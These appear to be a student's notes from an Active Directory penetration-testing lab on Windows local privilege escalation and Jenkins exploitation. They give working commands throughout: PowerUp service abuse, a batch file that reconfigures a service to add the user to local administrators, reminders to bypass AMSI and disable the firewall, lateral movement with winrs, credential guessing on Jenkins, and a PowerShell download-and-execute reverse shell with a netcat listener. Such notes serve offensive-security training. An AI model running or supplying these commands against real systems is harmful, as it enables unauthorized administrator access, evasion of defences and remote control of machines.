🔴Local PricEsc

there are lots of ways to do that

• Missing patches

• Automated Deployment

• Autologon passwords in clear text

• AlwaysInstallElavated

• Misconfigured Services

• DLL hijacking

But we are going to focus on these 3 service issues to escalate privileges:-

1. Unquoted path vulnerability in this service has space in its name and is running without quotted , because of which we can drop our executable in the middle of the name.

2. Modifing binaries path and change arguments we can altered their functionality and do privesc

3. services permission if the permissions are not configured properly & with enough permission we can point our serrvice to different executable

commands

get service with unquoted path

get-serviceunquoted -verbose

service where user can write it to binary path or change argument

get-modifiableservicefile -verbose

service where user can modify the configuration

get-modifiableservice -verbose

Tools

1. Powerup

2. beroot

3. privesc

Privesc 1

Privesc on our machine

load the script

. C:\AD\Tools\PowerUp.ps1

dont,forget to run bypass AMSI

1. To exploit the service

invoke-allchecks

Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\studentx' -Verbose

1. after that we need to logoff & logon again to gain local admin access

logoff

1. confirm we are local admin

net localgroup administrators

1. run Powershell as administrator

2. speed up the process run (BAT File)

@echo off
sc config AbyssWebServer binpath= "net localgroup administrators dcorp\student171 /add" 1>NUL
sc stop AbyssWebServer 1>NUL
sc start AbyssWebServer 1>NUL
sc config AbyssWebServer binpath= "C:\WebServer\Abyss Web Server\WebServer\abyssws.exe --service" 1>NUL
sc stop AbyssWebServer 1>NUL
sc start AbyssWebServer 1>NUL

echo The user has been added to local administrators xxxx
echo.

1. Turn off firewall we need it later in reverse shell process

2. Moving on ,Now we need a machine where our user has local admin access/session

. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1

find-psremotinglocaladminaccess

after finding that computer/machine we need to connect with that , in order to do that we can use

• winrs

winrs -r:dcorp-adminsrv cmd

• powershell

Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local

Privesc 2

Jenkins exploitation & reverse shell

login

jenkin server running on http://172.16.3.11:8080/ we need to login for user "navigate to people" & for credentials try both :- 1. same uname & pass same 2. same uname & revrerse pass

uploading reverse shell

1. for this we need builduser as we have to build the process to execute command as jenkin user

NOTE:- if we dont have admin access but still execute window commands then run

powershell -c command

1. navigate to >> project >> configure >> build triggers >> add build step >> execute window batch command >> enter command or reverse shell >> save >> build now

powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.X/Invoke-PowerShellTcp.ps1'));Power -Reverse -IPAddress 172.16.100.X -Port 443

powershell.exe iex (iwr http://172.16.100.X/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.X -Port 443

1. before clicking on "build now" execute HFS.exe and put "InvokePowerShellTcp.ps1" in it

2. turn on listner and click on build now , and we get the shell as local admin as "jenkins" needs that

C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443

1. check/confirm

net localgroup administrators

NOTE :-

sometimes prompt is not visible after getting reverse shell , you need to hit enter frew times to check

and also make sure the firewall is off all the time